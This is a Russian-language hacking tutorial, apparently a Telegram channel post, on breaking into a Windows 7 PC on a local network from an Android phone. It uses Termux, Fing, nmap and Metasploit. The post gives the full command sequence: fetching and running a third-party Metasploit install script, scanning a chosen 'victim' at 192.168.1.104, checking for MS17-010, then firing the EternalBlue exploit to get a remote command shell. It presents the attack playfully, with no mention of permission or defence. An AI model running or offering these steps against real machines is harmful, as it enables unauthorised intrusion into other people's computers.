Взлом ПК с андроида без root {Termux + EternalBlue}
https://tele.click/darkside_team
Привет хацкер, сегодня поиграем в Ватч Догс в реальной жизни. Будем ломать пк при помощи эксплойта EternalBlue.
Время взлома!
Всё что нам для этого понадобится:
- Телефон на Android
- Fing
- nmap
- temux и metasploit (или kali nethunter)
Качаем Termux с ГуглПлей (или с 4PDA)
Теперь установим metasploit:
apt update apt upgrade apt install curl curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh cd metasploit-framework-4.14.28 ./msfconsole
Загрузка будет долгой, не выключаем, будем терпиливыми.
После всего у нас должен открыться metasploit:
После того как вы установили metasploit можете считать что вы Sупер хаЦкер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне.
Сканирование сети c Fing
Теперь посмотрим кто есть в нашей сети.
Качаем приложение Fing
Вот так выглядит моя локальная сеть(у всех по разному):
И если у вас зрение не -40 то можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.
Сканирование на открытые порты c nmap
Установка nmap:
apt-get update apt-get install nmap
ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты:
Команда выглядит так: nmap ip жертвы
В моём случае это:
nmap 192.168.1.104
Есть бесконечное множество настроек nmap, но в данный момент подойдёт эта(из за скорости)
Вот что мы видим:
У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит eternalblue.
Проверка уязвимости
Проверка уязвимости
Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в termux.(Мне так просто реально удобнее)
Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву в metasploit вводите:
use auxiliary/scanner/smb/smb_ms17_010
Здесь нам нужно указать только ip адрес жертвы
Выглядит это так:
set RHOSTS ip жертвы
В моём случае это:
set RHOSTS 192.168.1.104
Запускаем скан командой run
Если мы видим что-то подобное значит хост уязвим к эксплоиту
Использование эксплоита
В том же metasploit пишем:
use exploit/windows/smb/ms17_010_eternalblue
Здесь нам нужно указать ip жертвы и процесс
Ip жертвы:
Выглядит это так:
set RHOST ip жертвы
В моём случае это:
set RHOST 192.168.1.104
И процесс:
set ProcessName explorer.exe
И после того как вы помолились и поставили икону на обои можно запускать эксплоит
exploit
Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компухтера.
Удачных взломов, аFFеристы.